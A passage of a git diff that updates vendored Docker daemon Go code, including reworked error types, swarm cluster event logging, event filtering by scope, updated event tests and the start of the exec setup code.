 		Images:     allImages,
 	}, nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/errors.go b/vendor/github.com/docker/docker/daemon/errors.go
index 566a32f175..6d02af3d54 100644
--- a/vendor/github.com/docker/docker/daemon/errors.go
+++ b/vendor/github.com/docker/docker/daemon/errors.go
@@ -1,57 +1,155 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"fmt"
 	"strings"
+	"syscall"
 
-	"github.com/docker/docker/api/errors"
-	"github.com/docker/docker/reference"
+	"github.com/docker/docker/errdefs"
+	"github.com/pkg/errors"
+	"google.golang.org/grpc"
 )
 
-func (d *Daemon) imageNotExistToErrcode(err error) error {
-	if dne, isDNE := err.(ErrImageDoesNotExist); isDNE {
-		if strings.Contains(dne.RefOrID, "@") {
-			e := fmt.Errorf("No such image: %s", dne.RefOrID)
-			return errors.NewRequestNotFoundError(e)
-		}
-		tag := reference.DefaultTag
-		ref, err := reference.ParseNamed(dne.RefOrID)
-		if err != nil {
-			e := fmt.Errorf("No such image: %s:%s", dne.RefOrID, tag)
-			return errors.NewRequestNotFoundError(e)
-		}
-		if tagged, isTagged := ref.(reference.NamedTagged); isTagged {
-			tag = tagged.Tag()
-		}
-		e := fmt.Errorf("No such image: %s:%s", ref.Name(), tag)
-		return errors.NewRequestNotFoundError(e)
-	}
-	return err
+func errNotRunning(id string) error {
+	return errdefs.Conflict(errors.Errorf("Container %s is not running", id))
 }
 
-type errNotRunning struct {
-	containerID string
+func containerNotFound(id string) error {
+	return objNotFoundError{"container", id}
 }
 
-func (e errNotRunning) Error() string {
-	return fmt.Sprintf("Container %s is not running", e.containerID)
+type objNotFoundError struct {
+	object string
+	id     string
 }
 
-func (e errNotRunning) ContainerIsRunning() bool {
-	return false
+func (e objNotFoundError) Error() string {
+	return "No such " + e.object + ": " + e.id
 }
 
+func (e objNotFoundError) NotFound() {}
+
 func errContainerIsRestarting(containerID string) error {
-	err := fmt.Errorf("Container %s is restarting, wait until the container is running", containerID)
-	return errors.NewRequestConflictError(err)
+	cause := errors.Errorf("Container %s is restarting, wait until the container is running", containerID)
+	return errdefs.Conflict(cause)
 }
 
 func errExecNotFound(id string) error {
-	err := fmt.Errorf("No such exec instance '%s' found in daemon", id)
-	return errors.NewRequestNotFoundError(err)
+	return objNotFoundError{"exec instance", id}
 }
 
 func errExecPaused(id string) error {
-	err := fmt.Errorf("Container %s is paused, unpause the container before exec", id)
-	return errors.NewRequestConflictError(err)
+	cause := errors.Errorf("Container %s is paused, unpause the container before exec", id)
+	return errdefs.Conflict(cause)
+}
+
+func errNotPaused(id string) error {
+	cause := errors.Errorf("Container %s is already paused", id)
+	return errdefs.Conflict(cause)
+}
+
+type nameConflictError struct {
+	id   string
+	name string
+}
+
+func (e nameConflictError) Error() string {
+	return fmt.Sprintf("Conflict. The container name %q is already in use by container %q. You have to remove (or rename) that container to be able to reuse that name.", e.name, e.id)
+}
+
+func (nameConflictError) Conflict() {}
+
+type containerNotModifiedError struct {
+	running bool
+}
+
+func (e containerNotModifiedError) Error() string {
+	if e.running {
+		return "Container is already started"
+	}
+	return "Container is already stopped"
+}
+
+func (e containerNotModifiedError) NotModified() {}
+
+type invalidIdentifier string
+
+func (e invalidIdentifier) Error() string {
+	return fmt.Sprintf("invalid name or ID supplied: %q", string(e))
+}
+
+func (invalidIdentifier) InvalidParameter() {}
+
+type duplicateMountPointError string
+
+func (e duplicateMountPointError) Error() string {
+	return "Duplicate mount point: " + string(e)
+}
+func (duplicateMountPointError) InvalidParameter() {}
+
+type containerFileNotFound struct {
+	file      string
+	container string
+}
+
+func (e containerFileNotFound) Error() string {
+	return "Could not find the file " + e.file + " in container " + e.container
+}
+
+func (containerFileNotFound) NotFound() {}
+
+type invalidFilter struct {
+	filter string
+	value  interface{}
+}
+
+func (e invalidFilter) Error() string {
+	msg := "Invalid filter '" + e.filter
+	if e.value != nil {
+		msg += fmt.Sprintf("=%s", e.value)
+	}
+	return msg + "'"
+}
+
+func (e invalidFilter) InvalidParameter() {}
+
+type startInvalidConfigError string
+
+func (e startInvalidConfigError) Error() string {
+	return string(e)
+}
+
+func (e startInvalidConfigError) InvalidParameter() {} // Is this right???
+
+func translateContainerdStartErr(cmd string, setExitCode func(int), err error) error {
+	errDesc := grpc.ErrorDesc(err)
+	contains := func(s1, s2 string) bool {
+		return strings.Contains(strings.ToLower(s1), s2)
+	}
+	var retErr = errdefs.Unknown(errors.New(errDesc))
+	// if we receive an internal error from the initial start of a container then lets
+	// return it instead of entering the restart loop
+	// set to 127 for container cmd not found/does not exist)
+	if contains(errDesc, cmd) &&
+		(contains(errDesc, "executable file not found") ||
+			contains(errDesc, "no such file or directory") ||
+			contains(errDesc, "system cannot find the file specified")) {
+		setExitCode(127)
+		retErr = startInvalidConfigError(errDesc)
+	}
+	// set to 126 for container cmd can't be invoked errors
+	if contains(errDesc, syscall.EACCES.Error()) {
+		setExitCode(126)
+		retErr = startInvalidConfigError(errDesc)
+	}
+
+	// attempted to mount a file onto a directory, or a directory onto a file, maybe from user specified bind mounts
+	if contains(errDesc, syscall.ENOTDIR.Error()) {
+		errDesc += ": Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type"
+		setExitCode(127)
+		retErr = startInvalidConfigError(errDesc)
+	}
+
+	// TODO: it would be nice to get some better errors from containerd so we can return better errors here
+	return retErr
 }
diff --git a/vendor/github.com/docker/docker/daemon/events.go b/vendor/github.com/docker/docker/daemon/events.go
index 8fe8e1b640..cf1634a198 100644
--- a/vendor/github.com/docker/docker/daemon/events.go
+++ b/vendor/github.com/docker/docker/daemon/events.go
@@ -1,6 +1,8 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"context"
+	"strconv"
 	"strings"
 	"time"
 
@@ -9,6 +11,17 @@ import (
 	"github.com/docker/docker/container"
 	daemonevents "github.com/docker/docker/daemon/events"
 	"github.com/docker/libnetwork"
+	swarmapi "github.com/docker/swarmkit/api"
+	gogotypes "github.com/gogo/protobuf/types"
+	"github.com/sirupsen/logrus"
+)
+
+var (
+	clusterEventAction = map[swarmapi.WatchActionKind]string{
+		swarmapi.WatchActionKindCreate: "create",
+		swarmapi.WatchActionKindUpdate: "update",
+		swarmapi.WatchActionKindRemove: "remove",
+	}
 )
 
 // LogContainerEvent generates an event related to a container with only the default attributes.
@@ -31,30 +44,6 @@ func (daemon *Daemon) LogContainerEventWithAttributes(container *container.Conta
 	daemon.EventsService.Log(action, events.ContainerEventType, actor)
 }
 
-// LogImageEvent generates an event related to an image with only the default attributes.
-func (daemon *Daemon) LogImageEvent(imageID, refName, action string) {
-	daemon.LogImageEventWithAttributes(imageID, refName, action, map[string]string{})
-}
-
-// LogImageEventWithAttributes generates an event related to an image with specific given attributes.
-func (daemon *Daemon) LogImageEventWithAttributes(imageID, refName, action string, attributes map[string]string) {
-	img, err := daemon.GetImage(imageID)
-	if err == nil && img.Config != nil {
-		// image has not been removed yet.
-		// it could be missing if the event is `delete`.
-		copyAttributes(attributes, img.Config.Labels)
-	}
-	if refName != "" {
-		attributes["name"] = refName
-	}
-	actor := events.Actor{
-		ID:         imageID,
-		Attributes: attributes,
-	}
-
-	daemon.EventsService.Log(action, events.ImageEventType, actor)
-}
-
 // LogPluginEvent generates an event related to a plugin with only the default attributes.
 func (daemon *Daemon) LogPluginEvent(pluginID, refName, action string) {
 	daemon.LogPluginEventWithAttributes(pluginID, refName, action, map[string]string{})
@@ -130,3 +119,190 @@ func copyAttributes(attributes, labels map[string]string) {
 		attributes[k] = v
 	}
 }
+
+// ProcessClusterNotifications gets changes from store and add them to event list
+func (daemon *Daemon) ProcessClusterNotifications(ctx context.Context, watchStream chan *swarmapi.WatchMessage) {
+	for {
+		select {
+		case <-ctx.Done():
+			return
+		case message, ok := <-watchStream:
+			if !ok {
+				logrus.Debug("cluster event channel has stopped")
+				return
+			}
+			daemon.generateClusterEvent(message)
+		}
+	}
+}
+
+func (daemon *Daemon) generateClusterEvent(msg *swarmapi.WatchMessage) {
+	for _, event := range msg.Events {
+		if event.Object == nil {
+			logrus.Errorf("event without object: %v", event)
+			continue
+		}
+		switch v := event.Object.GetObject().(type) {
+		case *swarmapi.Object_Node:
+			daemon.logNodeEvent(event.Action, v.Node, event.OldObject.GetNode())
+		case *swarmapi.Object_Service:
+			daemon.logServiceEvent(event.Action, v.Service, event.OldObject.GetService())
+		case *swarmapi.Object_Network:
+			daemon.logNetworkEvent(event.Action, v.Network, event.OldObject.GetNetwork())
+		case *swarmapi.Object_Secret:
+			daemon.logSecretEvent(event.Action, v.Secret, event.OldObject.GetSecret())
+		case *swarmapi.Object_Config:
+			daemon.logConfigEvent(event.Action, v.Config, event.OldObject.GetConfig())
+		default:
+			logrus.Warnf("unrecognized event: %v", event)
+		}
+	}
+}
+
+func (daemon *Daemon) logNetworkEvent(action swarmapi.WatchActionKind, net *swarmapi.Network, oldNet *swarmapi.Network) {
+	attributes := map[string]string{
+		"name": net.Spec.Annotations.Name,
+	}
+	eventTime := eventTimestamp(net.Meta, action)
+	daemon.logClusterEvent(action, net.ID, "network", attributes, eventTime)
+}
+
+func (daemon *Daemon) logSecretEvent(action swarmapi.WatchActionKind, secret *swarmapi.Secret, oldSecret *swarmapi.Secret) {
+	attributes := map[string]string{
+		"name": secret.Spec.Annotations.Name,
+	}
+	eventTime := eventTimestamp(secret.Meta, action)
+	daemon.logClusterEvent(action, secret.ID, "secret", attributes, eventTime)
+}
+
+func (daemon *Daemon) logConfigEvent(action swarmapi.WatchActionKind, config *swarmapi.Config, oldConfig *swarmapi.Config) {
+	attributes := map[string]string{
+		"name": config.Spec.Annotations.Name,
+	}
+	eventTime := eventTimestamp(config.Meta, action)
+	daemon.logClusterEvent(action, config.ID, "config", attributes, eventTime)
+}
+
+func (daemon *Daemon) logNodeEvent(action swarmapi.WatchActionKind, node *swarmapi.Node, oldNode *swarmapi.Node) {
+	name := node.Spec.Annotations.Name
+	if name == "" && node.Description != nil {
+		name = node.Description.Hostname
+	}
+	attributes := map[string]string{
+		"name": name,
+	}
+	eventTime := eventTimestamp(node.Meta, action)
+	// In an update event, display the changes in attributes
+	if action == swarmapi.WatchActionKindUpdate && oldNode != nil {
+		if node.Spec.Availability != oldNode.Spec.Availability {
+			attributes["availability.old"] = strings.ToLower(oldNode.Spec.Availability.String())
+			attributes["availability.new"] = strings.ToLower(node.Spec.Availability.String())
+		}
+		if node.Role != oldNode.Role {
+			attributes["role.old"] = strings.ToLower(oldNode.Role.String())
+			attributes["role.new"] = strings.ToLower(node.Role.String())
+		}
+		if node.Status.State != oldNode.Status.State {
+			attributes["state.old"] = strings.ToLower(oldNode.Status.State.String())
+			attributes["state.new"] = strings.ToLower(node.Status.State.String())
+		}
+		// This handles change within manager role
+		if node.ManagerStatus != nil && oldNode.ManagerStatus != nil {
+			// leader change
+			if node.ManagerStatus.Leader != oldNode.ManagerStatus.Leader {
+				if node.ManagerStatus.Leader {
+					attributes["leader.old"] = "false"
+					attributes["leader.new"] = "true"
+				} else {
+					attributes["leader.old"] = "true"
+					attributes["leader.new"] = "false"
+				}
+			}
+			if node.ManagerStatus.Reachability != oldNode.ManagerStatus.Reachability {
+				attributes["reachability.old"] = strings.ToLower(oldNode.ManagerStatus.Reachability.String())
+				attributes["reachability.new"] = strings.ToLower(node.ManagerStatus.Reachability.String())
+			}
+		}
+	}
+
+	daemon.logClusterEvent(action, node.ID, "node", attributes, eventTime)
+}
+
+func (daemon *Daemon) logServiceEvent(action swarmapi.WatchActionKind, service *swarmapi.Service, oldService *swarmapi.Service) {
+	attributes := map[string]string{
+		"name": service.Spec.Annotations.Name,
+	}
+	eventTime := eventTimestamp(service.Meta, action)
+
+	if action == swarmapi.WatchActionKindUpdate && oldService != nil {
+		// check image
+		if x, ok := service.Spec.Task.GetRuntime().(*swarmapi.TaskSpec_Container); ok {
+			containerSpec := x.Container
+			if y, ok := oldService.Spec.Task.GetRuntime().(*swarmapi.TaskSpec_Container); ok {
+				oldContainerSpec := y.Container
+				if containerSpec.Image != oldContainerSpec.Image {
+					attributes["image.old"] = oldContainerSpec.Image
+					attributes["image.new"] = containerSpec.Image
+				}
+			} else {
+				// This should not happen.
+				logrus.Errorf("service %s runtime changed from %T to %T", service.Spec.Annotations.Name, oldService.Spec.Task.GetRuntime(), service.Spec.Task.GetRuntime())
+			}
+		}
+		// check replicated count change
+		if x, ok := service.Spec.GetMode().(*swarmapi.ServiceSpec_Replicated); ok {
+			replicas := x.Replicated.Replicas
+			if y, ok := oldService.Spec.GetMode().(*swarmapi.ServiceSpec_Replicated); ok {
+				oldReplicas := y.Replicated.Replicas
+				if replicas != oldReplicas {
+					attributes["replicas.old"] = strconv.FormatUint(oldReplicas, 10)
+					attributes["replicas.new"] = strconv.FormatUint(replicas, 10)
+				}
+			} else {
+				// This should not happen.
+				logrus.Errorf("service %s mode changed from %T to %T", service.Spec.Annotations.Name, oldService.Spec.GetMode(), service.Spec.GetMode())
+			}
+		}
+		if service.UpdateStatus != nil {
+			if oldService.UpdateStatus == nil {
+				attributes["updatestate.new"] = strings.ToLower(service.UpdateStatus.State.String())
+			} else if service.UpdateStatus.State != oldService.UpdateStatus.State {
+				attributes["updatestate.old"] = strings.ToLower(oldService.UpdateStatus.State.String())
+				attributes["updatestate.new"] = strings.ToLower(service.UpdateStatus.State.String())
+			}
+		}
+	}
+	daemon.logClusterEvent(action, service.ID, "service", attributes, eventTime)
+}
+
+func (daemon *Daemon) logClusterEvent(action swarmapi.WatchActionKind, id, eventType string, attributes map[string]string, eventTime time.Time) {
+	actor := events.Actor{
+		ID:         id,
+		Attributes: attributes,
+	}
+
+	jm := events.Message{
+		Action:   clusterEventAction[action],
+		Type:     eventType,
+		Actor:    actor,
+		Scope:    "swarm",
+		Time:     eventTime.UTC().Unix(),
+		TimeNano: eventTime.UTC().UnixNano(),
+	}
+	daemon.EventsService.PublishMessage(jm)
+}
+
+func eventTimestamp(meta swarmapi.Meta, action swarmapi.WatchActionKind) time.Time {
+	var eventTime time.Time
+	switch action {
+	case swarmapi.WatchActionKindCreate:
+		eventTime, _ = gogotypes.TimestampFromProto(meta.CreatedAt)
+	case swarmapi.WatchActionKindUpdate:
+		eventTime, _ = gogotypes.TimestampFromProto(meta.UpdatedAt)
+	case swarmapi.WatchActionKindRemove:
+		// There is no timestamp from store message for remove operations.
+		// Use current time.
+		eventTime = time.Now()
+	}
+	return eventTime
+}
diff --git a/vendor/github.com/docker/docker/daemon/events/events.go b/vendor/github.com/docker/docker/daemon/events/events.go
index 0bf105f54d..31af271fe6 100644
--- a/vendor/github.com/docker/docker/daemon/events/events.go
+++ b/vendor/github.com/docker/docker/daemon/events/events.go
@@ -1,4 +1,4 @@
-package events
+package events // import "github.com/docker/docker/daemon/events"
 
 import (
 	"sync"
@@ -9,7 +9,7 @@ import (
 )
 
 const (
-	eventsLimit = 64
+	eventsLimit = 256
 	bufferSize  = 1024
 )
 
@@ -28,7 +28,7 @@ func New() *Events {
 	}
 }
 
-// Subscribe adds new listener to events, returns slice of 64 stored
+// Subscribe adds new listener to events, returns slice of 256 stored
 // last events, a channel in which you can expect new events (in form
 // of interface{}, so you need type assertion), and a function to call
 // to stop the stream of events.
@@ -46,7 +46,7 @@ func (e *Events) Subscribe() ([]eventtypes.Message, chan interface{}, func()) {
 	return current, l, cancel
 }
 
-// SubscribeTopic adds new listener to events, returns slice of 64 stored
+// SubscribeTopic adds new listener to events, returns slice of 256 stored
 // last events, a channel in which you can expect new events (in form
 // of interface{}, so you need type assertion).
 func (e *Events) SubscribeTopic(since, until time.Time, ef *Filter) ([]eventtypes.Message, chan interface{}) {
@@ -78,15 +78,14 @@ func (e *Events) Evict(l chan interface{}) {
 	e.pub.Evict(l)
 }
 
-// Log broadcasts event to listeners. Each listener has 100 millisecond for
-// receiving event or it will be skipped.
+// Log creates a local scope message and publishes it
 func (e *Events) Log(action, eventType string, actor eventtypes.Actor) {
-	eventsCounter.Inc()
 	now := time.Now().UTC()
 	jm := eventtypes.Message{
 		Action:   action,
 		Type:     eventType,
 		Actor:    actor,
+		Scope:    "local",
 		Time:     now.Unix(),
 		TimeNano: now.UnixNano(),
 	}
@@ -102,6 +101,14 @@ func (e *Events) Log(action, eventType string, actor eventtypes.Actor) {
 		jm.Status = action
 	}
 
+	e.PublishMessage(jm)
+}
+
+// PublishMessage broadcasts event to listeners. Each listener has 100 milliseconds to
+// receive the event or it will be skipped.
+func (e *Events) PublishMessage(jm eventtypes.Message) {
+	eventsCounter.Inc()
+
 	e.mu.Lock()
 	if len(e.events) == cap(e.events) {
 		// discard oldest event
diff --git a/vendor/github.com/docker/docker/daemon/events/events_test.go b/vendor/github.com/docker/docker/daemon/events/events_test.go
index bbd160f901..d11521567f 100644
--- a/vendor/github.com/docker/docker/daemon/events/events_test.go
+++ b/vendor/github.com/docker/docker/daemon/events/events_test.go
@@ -1,4 +1,4 @@
-package events
+package events // import "github.com/docker/docker/daemon/events"
 
 import (
 	"fmt"
@@ -135,21 +135,28 @@ func TestLogEvents(t *testing.T) {
 		t.Fatalf("Must be %d events, got %d", eventsLimit, len(current))
 	}
 	first := current[0]
-	if first.Status != "action_16" {
-		t.Fatalf("First action is %s, must be action_16", first.Status)
+
+	// TODO remove this once we removed the deprecated `ID`, `Status`, and `From` fields
+	if first.Action != first.Status {
+		// Verify that the (deprecated) Status is set to the expected value
+		t.Fatalf("Action (%s) does not match Status (%s)", first.Action, first.Status)
+	}
+
+	if first.Action != "action_16" {
+		t.Fatalf("First action is %s, must be action_16", first.Action)
 	}
 	last := current[len(current)-1]
-	if last.Status != "action_79" {
-		t.Fatalf("Last action is %s, must be action_79", last.Status)
+	if last.Action != "action_271" {
+		t.Fatalf("Last action is %s, must be action_271", last.Action)
 	}
 
 	firstC := msgs[0]
-	if firstC.Status != "action_80" {
-		t.Fatalf("First action is %s, must be action_80", firstC.Status)
+	if firstC.Action != "action_272" {
+		t.Fatalf("First action is %s, must be action_272", firstC.Action)
 	}
 	lastC := msgs[len(msgs)-1]
-	if lastC.Status != "action_89" {
-		t.Fatalf("Last action is %s, must be action_89", lastC.Status)
+	if lastC.Action != "action_281" {
+		t.Fatalf("Last action is %s, must be action_281", lastC.Action)
 	}
 }
 
@@ -247,7 +254,7 @@ func TestLoadBufferedEventsOnlyFromPast(t *testing.T) {
 }
 
 // #13753
-func TestIngoreBufferedWhenNoTimes(t *testing.T) {
+func TestIgnoreBufferedWhenNoTimes(t *testing.T) {
 	m1, err := eventstestutils.Scan("2016-03-07T17:28:03.022433271+02:00 container die 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover)")
 	if err != nil {
 		t.Fatal(err)
diff --git a/vendor/github.com/docker/docker/daemon/events/filter.go b/vendor/github.com/docker/docker/daemon/events/filter.go
index 5c9c527692..da06f18b06 100644
--- a/vendor/github.com/docker/docker/daemon/events/filter.go
+++ b/vendor/github.com/docker/docker/daemon/events/filter.go
@@ -1,9 +1,9 @@
-package events
+package events // import "github.com/docker/docker/daemon/events"
 
 import (
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/api/types/events"
 	"github.com/docker/docker/api/types/filters"
-	"github.com/docker/docker/reference"
 )
 
 // Filter can filter out docker events from a stream
@@ -20,12 +20,17 @@ func NewFilter(filter filters.Args) *Filter {
 func (ef *Filter) Include(ev events.Message) bool {
 	return ef.matchEvent(ev) &&
 		ef.filter.ExactMatch("type", ev.Type) &&
+		ef.matchScope(ev.Scope) &&
 		ef.matchDaemon(ev) &&
 		ef.matchContainer(ev) &&
 		ef.matchPlugin(ev) &&
 		ef.matchVolume(ev) &&
 		ef.matchNetwork(ev) &&
 		ef.matchImage(ev) &&
+		ef.matchNode(ev) &&
+		ef.matchService(ev) &&
+		ef.matchSecret(ev) &&
+		ef.matchConfig(ev) &&
 		ef.matchLabels(ev.Actor.Attributes)
 }
 
@@ -47,8 +52,15 @@ func (ef *Filter) filterContains(field string, values map[string]struct{}) bool
 	return false
 }
 
+func (ef *Filter) matchScope(scope string) bool {
+	if !ef.filter.Contains("scope") {
+		return true
+	}
+	return ef.filter.ExactMatch("scope", scope)
+}
+
 func (ef *Filter) matchLabels(attributes map[string]string) bool {
-	if !ef.filter.Include("label") {
+	if !ef.filter.Contains("label") {
 		return true
 	}
 	return ef.filter.MatchKVList("label", attributes)
@@ -74,6 +86,22 @@ func (ef *Filter) matchNetwork(ev events.Message) bool {
 	return ef.fuzzyMatchName(ev, events.NetworkEventType)
 }
 
+func (ef *Filter) matchService(ev events.Message) bool {
+	return ef.fuzzyMatchName(ev, events.ServiceEventType)
+}
+
+func (ef *Filter) matchNode(ev events.Message) bool {
+	return ef.fuzzyMatchName(ev, events.NodeEventType)
+}
+
+func (ef *Filter) matchSecret(ev events.Message) bool {
+	return ef.fuzzyMatchName(ev, events.SecretEventType)
+}
+
+func (ef *Filter) matchConfig(ev events.Message) bool {
+	return ef.fuzzyMatchName(ev, events.ConfigEventType)
+}
+
 func (ef *Filter) fuzzyMatchName(ev events.Message, eventType string) bool {
 	return ef.filter.FuzzyMatch(eventType, ev.Actor.ID) ||
 		ef.filter.FuzzyMatch(eventType, ev.Actor.Attributes["name"])
@@ -102,9 +130,9 @@ func (ef *Filter) matchImage(ev events.Message) bool {
 }
 
 func stripTag(image string) string {
-	ref, err := reference.ParseNamed(image)
+	ref, err := reference.ParseNormalizedNamed(image)
 	if err != nil {
 		return image
 	}
-	return ref.Name()
+	return reference.FamiliarName(ref)
 }
diff --git a/vendor/github.com/docker/docker/daemon/events/metrics.go b/vendor/github.com/docker/docker/daemon/events/metrics.go
index c9a89ec0ed..199858d6e0 100644
--- a/vendor/github.com/docker/docker/daemon/events/metrics.go
+++ b/vendor/github.com/docker/docker/daemon/events/metrics.go
@@ -1,4 +1,4 @@
-package events
+package events // import "github.com/docker/docker/daemon/events"
 
 import "github.com/docker/go-metrics"
 
diff --git a/vendor/github.com/docker/docker/daemon/events/testutils/testutils.go b/vendor/github.com/docker/docker/daemon/events/testutils/testutils.go
index 3544446e18..b6766adb90 100644
--- a/vendor/github.com/docker/docker/daemon/events/testutils/testutils.go
+++ b/vendor/github.com/docker/docker/daemon/events/testutils/testutils.go
@@ -1,4 +1,4 @@
-package testutils
+package testutils // import "github.com/docker/docker/daemon/events/testutils"
 
 import (
 	"fmt"
diff --git a/vendor/github.com/docker/docker/daemon/events_test.go b/vendor/github.com/docker/docker/daemon/events_test.go
index 2dbcc27dfc..df089976f2 100644
--- a/vendor/github.com/docker/docker/daemon/events_test.go
+++ b/vendor/github.com/docker/docker/daemon/events_test.go
@@ -1,4 +1,4 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"testing"
@@ -16,15 +16,13 @@ func TestLogContainerEventCopyLabels(t *testing.T) {
 	defer e.Evict(l)
 
 	container := &container.Container{
-		CommonContainer: container.CommonContainer{
-			ID:   "container_id",
-			Name: "container_name",
-			Config: &containertypes.Config{
-				Image: "image_name",
-				Labels: map[string]string{
-					"node": "1",
-					"os":   "alpine",
-				},
+		ID:   "container_id",
+		Name: "container_name",
+		Config: &containertypes.Config{
+			Image: "image_name",
+			Labels: map[string]string{
+				"node": "1",
+				"os":   "alpine",
 			},
 		},
 	}
@@ -49,14 +47,12 @@ func TestLogContainerEventWithAttributes(t *testing.T) {
 	defer e.Evict(l)
 
 	container := &container.Container{
-		CommonContainer: container.CommonContainer{
-			ID:   "container_id",
-			Name: "container_name",
-			Config: &containertypes.Config{
-				Labels: map[string]string{
-					"node": "1",
-					"os":   "alpine",
-				},
+		ID:   "container_id",
+		Name: "container_name",
+		Config: &containertypes.Config{
+			Labels: map[string]string{
+				"node": "1",
+				"os":   "alpine",
 			},
 		},
 	}
@@ -89,6 +85,6 @@ func validateTestAttributes(t *testing.T, l chan interface{}, expectedAttributes
 			}
 		}
 	case <-time.After(10 * time.Second):
-		t.Fatalf("LogEvent test timed out")
+		t.Fatal("LogEvent test timed out")
 	}
 }
diff --git a/vendor/github.com/docker/docker/daemon/exec.go b/vendor/github.com/docker/docker/daemon/exec.go
index 8197426a33..f0b43d7253 100644
--- a/vendor/github.com/docker/docker/daemon/exec.go
+++ b/vendor/github.com/docker/docker/daemon/exec.go
@@ -1,24 +1,24 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"context"
 	"fmt"
 	"io"
 	"strings"
 	"time"
 
-	"golang.org/x/net/context"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/api/errors"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/strslice"
 	"github.com/docker/docker/container"
+	"github.com/docker/docker/container/stream"
 	"github.com/docker/docker/daemon/exec"
-	"github.com/docker/docker/libcontainerd"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/pkg/pools"
 	"github.com/docker/docker/pkg/signal"
 	"github.com/docker/docker/pkg/term"
-	"github.com/docker/docker/utils"
+	specs "github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 // Seconds to wait after sending TERM before trying KILL
@@ -44,34 +44,34 @@ func (d *Daemon) ExecExists(name string) (bool, error) {
 // with the exec instance is stopped or paused, it will return an error.
 func (d *Daemon) getExecConfig(name string) (*exec.Config, error) {
 	ec := d.execCommands.Get(name)
+	if ec == nil {
+		return nil, errExecNotFound(name)
+	}
 
 	// If the exec is found but its container is not in the daemon's list of
 	// containers then it must have been deleted, in which case instead of
 	// saying the container isn't running, we should return a 404 so that
 	// the user sees the same error now that they will after the
 	// 5 minute clean-up loop is run which erases old/dead execs.
-
-	if ec != nil {
-		if container := d.containers.Get(ec.ContainerID); container != nil {
-			if !container.IsRunning() {
-				return nil, fmt.Errorf("Container %s is not running: %s", container.ID, container.State.String())
-			}
-			if container.IsPaused() {
-				return nil, errExecPaused(container.ID)
-			}
-			if container.IsRestarting() {
-				return nil, errContainerIsRestarting(container.ID)
-			}
-			return ec, nil
-		}
+	container := d.containers.Get(ec.ContainerID)
+	if container == nil {
+		return nil, containerNotFound(name)
 	}
-
-	return nil, errExecNotFound(name)
+	if !container.IsRunning() {
+		return nil, fmt.Errorf("Container %s is not running: %s", container.ID, container.State.String())
+	}
+	if container.IsPaused() {
+		return nil, errExecPaused(container.ID)
+	}
+	if container.IsRestarting() {
+		return nil, errContainerIsRestarting(container.ID)
+	}
+	return ec, nil
 }
 
 func (d *Daemon) unregisterExecCommand(container *container.Container, execConfig *exec.Config) {
-	container.ExecCommands.Delete(execConfig.ID)
-	d.execCommands.Delete(execConfig.ID)
+	container.ExecCommands.Delete(execConfig.ID, execConfig.Pid)
+	d.execCommands.Delete(execConfig.ID, execConfig.Pid)
 }
 
 func (d *Daemon) getActiveContainer(name string) (*container.Container, error) {
@@ -81,7 +81,7 @@ func (d *Daemon) getActiveContainer(name string) (*container.Container, error) {
 	}
 
 	if !container.IsRunning() {
-		return nil, errNotRunning{container.ID}
+		return nil, errNotRunning(container.ID)
 	}
 	if container.IsPaused() {
 		return nil, errExecPaused(name)
@@ -94,7 +94,7 @@ func (d *Daemon) getActiveContainer(name string) (*container.Container, error) {
 
 // ContainerExecCreate sets up an exec in a running container.
 func (d *Daemon) ContainerExecCreate(name string, config *types.ExecConfig) (string, error) {
-	container, err := d.getActiveContainer(name)
+	cntr, err := d.getActiveContainer(name)
 	if err != nil {
 		return "", err
 	}
@@ -115,26 +115,33 @@ func (d *Daemon) ContainerExecCreate(name string, config *types.ExecConfig) (str
 	execConfig.OpenStdin = config.AttachStdin
 	execConfig.OpenStdout = config.AttachStdout
 	execConfig.OpenStderr = config.AttachStderr
-	execConfig.ContainerID = container.ID
+	execConfig.ContainerID = cntr.ID
 	execConfig.DetachKeys = keys
 	execConfig.Entrypoint = entrypoint
 	execConfig.Args = args
 	execConfig.Tty = config.Tty
 	execConfig.Privileged = config.Privileged
 	execConfig.User = config.User
+	execConfig.WorkingDir = config.WorkingDir
 
-	linkedEnv, err := d.setupLinkedContainers(container)
+	linkedEnv, err := d.setupLinkedContainers(cntr)
 	if err != nil {
 		return "", err
 	}
-	execConfig.Env = utils.ReplaceOrAppendEnvValues(container.CreateDaemonEnvironment(config.Tty, linkedEnv), config.Env)
+	execConfig.Env = container.ReplaceOrAppendEnvValues(cntr.CreateDaemonEnvironment(config.Tty, linkedEnv), config.Env)
 	if len(execConfig.User) == 0 {
-		execConfig.User = container.Config.User
+		execConfig.User = cntr.Config.User
+	}
+	if len(execConfig.WorkingDir) == 0 {
+		execConfig.WorkingDir = cntr.Config.WorkingDir
 	}
 
-	d.registerExecCommand(container, execConfig)
+	d.registerExecCommand(cntr, execConfig)
 
-	d.LogContainerEvent(container, "exec_create: "+execConfig.Entrypoint+" "+strings.Join(execConfig.Args, " "))
+	attributes := map[string]string{
+		"execID": execConfig.ID,
+	}
+	d.LogContainerEventWithAttributes(cntr, "exec_create: "+execConfig.Entrypoint+" "+strings.Join(execConfig.Args, " "), attributes)
 
 	return execConfig.ID, nil
 }
@@ -142,7 +149,7 @@ func (d *Daemon) ContainerExecCreate(name string, config *types.ExecConfig) (str
 // ContainerExecStart starts a previously set up exec instance. The
 // std streams are set up.
 // If ctx is cancelled, the process is terminated.
-func (d *Daemon) ContainerExecStart(ctx context.Context, name string, stdin io.ReadCloser, stdout io.Writer, stderr io.Writer) (err error) {
+func (d *Daemon) ContainerExecStart(ctx context.Context, name string, stdin io.Reader, stdout io.Writer, stderr io.Writer) (err error) {
 	var (
 		cStdin           io.ReadCloser
 		cStdout, cStderr io.Writer
